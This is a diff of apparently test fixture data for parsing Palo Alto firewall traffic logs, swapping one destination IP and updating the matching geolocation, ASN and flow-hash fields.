@@ -1159,7 +1162,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "panw": { "panos": { "ruleset": "rule1", @@ -1193,7 +1196,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:pxN/AvFcFozLjRgniFdZmScORYQ=", + "community_id": "1:wrjvr39KOJdRAr4D6/DhjQskkpQ=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -1231,14 +1234,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283876974Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "ingested": "2021-12-09T13:43:22.381684800Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -1261,27 +1264,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 806, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 4 }, "rule": { 
@@ -1300,7 +1302,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "panw": { "panos": { "ruleset": "rule1", @@ -1334,7 +1336,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:HmuQtYxq+NpgJ0zVEIpz7zLNOKM=", + "community_id": "1:vVKdp0O16Den9irRVjMMfrNiAJI=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -1372,14 +1374,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.283881574Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "ingested": "2021-12-09T13:43:22.381690100Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -1402,27 +1404,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -1441,7 +1442,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -1475,7 +1476,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:I7NZAEypUvCTVa5iVWyAsWeEWgY=", + "community_id": "1:YgO6m4pYjlO/px7eSvDVXMyhT9w=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -1513,14 +1514,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283886168Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381695400Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -1543,27 +1544,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -1582,7 +1582,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -1616,7 +1616,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:GOqfpUTezPkpm6axBI22kY90kU4=", + "community_id": "1:36riPo5QLmTmjShd1xO6omV9lbg=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -1654,14 +1654,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283891148Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381701200Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -1684,27 +1684,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -1723,7 +1722,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -1757,7 +1756,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:aiB5YppFUGX0pM/1Xtp3qOSFXJw=", + "community_id": "1:6fDJsdstw4iPHg4mtYfqCIw/9W8=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -1795,14 +1794,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283895774Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381706400Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -1825,27 +1824,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -1864,7 +1862,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -1898,7 +1896,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ghLw4NDj0JmAhH9lVtlhdQpqEQ0=", + "community_id": "1:CvgumdBliLFimUvrE/1C91M3lrQ=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -1936,14 +1934,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283900357Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381711800Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -1966,27 +1964,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 806, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 4 }, "rule": { 
@@ -2005,7 +2002,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "panw": { "panos": { "ruleset": "rule1", @@ -2039,7 +2036,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:SIxV4kkvJlBljF+gLKAaihputgk=", + "community_id": "1:TcEOieIy4pig/edaJwIxupG/GL8=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -2077,14 +2074,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283928233Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "ingested": "2021-12-09T13:43:22.381717100Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -2107,27 +2104,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 806, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 4 }, "rule": { 
@@ -2146,7 +2142,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "panw": { "panos": { "ruleset": "rule1", @@ -2180,7 +2176,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:rpU2pqp4ioYKgiuDEfjZitnLkow=", + "community_id": "1:f7Ng4EbjzMyrFro3SgGMhIUPtms=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -2218,14 +2214,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.283936100Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "ingested": "2021-12-09T13:43:22.381722300Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -2248,27 +2244,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 551, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 3 }, "rule": { 
@@ -2287,7 +2282,7 @@ }, "packets": 18 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3", "panw": { "panos": { "ruleset": "rule1", @@ -2321,7 +2316,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:JuKJfhPs1pDZMiwy04nz1EsD7PA=", + "community_id": "1:OvxXAeJmXE3c0IiRCKr2+Z4qk7Y=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -2359,14 +2354,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 512000000000, - "ingested": "2021-09-08T12:38:09.283941201Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3", + "ingested": "2021-12-09T13:43:22.381727900Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -2389,27 +2384,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -2428,7 +2422,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -2462,7 +2456,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:bZl1JgwyPgfsbSrD+z8I/hpbdc4=", + "community_id": "1:3be4rO6jMOmXDKYhNViDYESR4pg=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -2500,14 +2494,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283950381Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 